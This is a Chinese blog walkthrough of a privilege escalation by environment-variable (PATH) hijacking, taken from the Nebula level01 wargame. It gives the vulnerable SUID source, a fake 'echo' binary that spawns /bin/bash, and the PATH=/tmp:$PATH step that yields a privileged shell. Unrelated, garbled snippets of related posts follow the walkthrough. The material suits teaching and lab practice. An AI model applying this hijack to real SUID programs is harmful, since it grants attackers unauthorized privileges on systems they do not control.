2. 程式人生 > >環境變量法提權

環境變量法提權

阿新 發佈:2019-02-14
oca and nis tgz spa pip ace sspi pipe

有些應用程序使用了system等函數調用了系統命令,但是沒有使用絕對路徑而是使用env命令從環境變量中進行查找,這就可能通過修改環境變量來進行權限提升

看下面的例子,本例來自於nebula:

//flag01.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid 
 
= getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}
//編譯後得到flag01程序,這個程序具有suid權限

flag01程序通過env命令執行了echo命令

1、創建自己的echo命令,保存在/tmp目錄下

//echo.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include 
 
<sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  system("/bin/bash");
}
level01@nebula:/tmp$

//gcc -o echo echo.c

2、查看下當前的環境變量

level01@nebula:/home/flag01$ env
TERM=xterm-256color
SHELL=/bin/sh
SSH_CLIENT=192.168.109.216 52044 22
OLDPWD=/home
SSH_TTY=/dev/pts/0
USER=level01
LS_COLORS
 
=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/level01
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/home/flag01
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/level01
LANGUAGE=en_US:
LOGNAME=level01
SSH_CONNECTION=192.168.109.216 52044 192.168.109.196 22
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
level01@nebula:/home/flag01$

運行一下命令將/tmp目錄加入PATH變量的最前面,是的env命令首先執行我們自己的echo命令

level01@nebula:/tmp$ PATH=/tmp:$PATH

3、執行flag01程序,由於flag01程序具有suid位,所以flag01會以自身權限執行/tmp/echo命令。/tmp/echo又以flag01的權限執行了/bin/bash命令

因此我們得到了一個flag01權限的shell

環境變量法提權

相關推薦

環境

oca and nis tgz spa pip ace sspi pipe 有些應用程序使用了system等函數調用了系統命令,但是沒有使用絕對路徑而是使用env命令從環境變量中進行查找,這就可能通過修改環境變量來進行權限提升 看下面的例子,本例來自於nebula: //

設置JDK環境(linux版)

登錄 eclipse .org class pan XML 目錄 必須 set 設置環境變量一、修改/etc/profile文件當本機僅僅作為開發使用時推薦使用這種方法,因為此種配置時所有用戶的shell都有權使用這些環境變量,可能會給系統帶來安全性問題。用文本編輯器打開

訪問進程環境environ時的一個坑

sde strcmp clas 執行 程序 表示 pri 而且 ptr 在unistd.h中定義了變量char **environ;來表示當前所有環境變量,一般來說訪問特定環境變量可以用getenv,但是想遍歷所有環境變量就得使用environ。 即在程序內全局聲明exte

Java環境的理解

java環境變量的理解path變量的內容很多,由於可能在開發軟件過程中,頻繁切換jdk,所以避免修改path,變量d:/jdk/bin;異變化的是 d:/jdk提出的思想就是:為了解決這個問題,對於異變的地方我們要盡量的抽象出來(拿出去),讓其保持不變。這樣就創建個環境變量,JAVA_HOMEpath:可以在

設置JAVA環境

class cal dt.jar home source clas usr jre_home java_home export JAVA_HOME=/usr/local/jdkexport JRE_HOME=/usr/local/jdk/jreexport CLASSPAT

slz-JDK1.8的環境配置

ava evel .com 成功 clas -s font 文件 中新 JDK(Java Development Kit) 是 Java 語言的軟件開發工具包(SDK)。 1.在計算機右鍵點擊屬性 2.打開下載的綠色版的jdk1.8,打開lib所在目錄並復制所在位置

環境

linux 環境變量 要想學會Linux中的shell腳本,掌握環境變量尤為重要。下面跟大家分享下環境變量相關知識。 環境變量常量 可以賦值給變量的任何字符串變量 字符串 不能以數字開頭,只能由數字,字母和下劃線組成,可以接受賦值的字符串如何自定義變量?A=10 如何查看變量的值?ech

學會配置jdk環境

bsp blog font 新建 是你 所在 右鍵 win 百度 一、jdk環境變量的配置 提示:要配jdk環境變量,就要有jdk文件。jdk文件自行百度下載 而且win10和win7的設置有點差異,但基本的都一樣,都是這樣設置的 第一步:首先右鍵“我的電腦”,點擊

Git配置環境

status mail use add email sta 中新 環境變量 本地倉庫 Git的原理操作模型: 最基本的配置:   1,先在你需要的文件夾中新建一個本地倉庫,做法是在文件夾目錄中shift+右鍵打開命令行,輸入git init就可以了這時候我這個文件就會被gi

npm 全局環境配置

命令 內部 log cnblogs 系統設置 ejs 文件 con eight 我們要先配置npm的全局模塊的存放路徑以及cache的路徑,例如我希望將以上兩個文件夾放在NodeJS的主目錄下,便在NodeJs下建立”node_global”及”node_c

Maven環境

ram tro path rep tor linux linu local 3.5 Windows: M2_HOME=D:\ProgramFiles\apache-maven-3.5.0M2_REPO=D:\ProgramFiles\maven\repositoryPAT

bash僅僅讀的環境

table adding $* $$ add 進程 退出狀態 一個 變量 環境變量名 變量的用途 $0 程序的名字 $1~$9 命令參數1~9的值 $* 全部命令行參數的值 $@ [email pro

Linux中環境/etc/profile ~/.bashrc 和 ~/.bash_profile 和 /etc/bashrc 的區別

linux中環境變量/etc/profile ~/.bashrc 和 ~/.bash_profile 和 /etc/bashrc 的區別 這個一定要理解登錄式shell和非登錄式shell的區別,前者是完全切換用戶,後者是不完全,就算切換過來了,你pwd時家目錄還是之前的家目錄,所以 登錄

配置環境

tro apach 刪除 默認 jdk 修改 file pat 搜索 Windows下JAVA用到的環境變量主要有3個,JAVA_HOME、CLASSPATH、PATH。 JAVA_HOME 指向的是JDK的安裝路徑,如C:\jdk1.5.0_06,在這路徑下你

dos環境設置及字符串替換

bin pre winrar ansi pat manager etl article bsp (1) 通過wmic命令完畢對系統環境變量的設定,xp下直接生效,win7須要重新啟動電腦或在電腦-》屬性-》高級-》環境變量,下來點確定 @echo off s

面面觀 | docker下開發,修改環境啟動jetty

from 官網 ons 啟動 好的 step config alt project 01 本地測試docker程序 遇到問題:Docker程序使用系統的環境變量啟動的。 新智雲官網www.enncloud.cn 在服務器運行的時候是可以的,但是在本地啟動的時候就補行了。

java環境設置

環境 java環境變量 program too spa pro nbsp 環境變量 1.8 增加環境變量: JAVA_HOME C:\Program Files (x86)\Java\jdk1.8.0_131 CLASSPATH .%JAVA_HOME%\lib;%

win10配置java環境問題

exe set 說了 spa ref 環境變量 命令行 命令 當前 配置環境變量,基本就是在計算機--》屬性---》高級系統設置---》環境變量--》系統變量 ---------------------------- JAVA_HOME C:\Program

window10下java環境的配置 javac不是內部或外部命令的問題

src 寫上 文件夾 配置 註意 jre tails 流程 logs http://blog.csdn.net/suncold123/article/details/48392135 參考與上面這個博主。 今天在win10下重新配置了一下java環境變量。跟著網上的流程下來

配置git 環境

hmc pbm 運行 右鍵 scm 程序 fill 設置 分號 1、從Git官網下載windows版本的git:http://git-scm.com/downloads 2、一般使用默認設置即可:一路next,git安裝完畢! 3、但是如果這時你打開windows的cmd,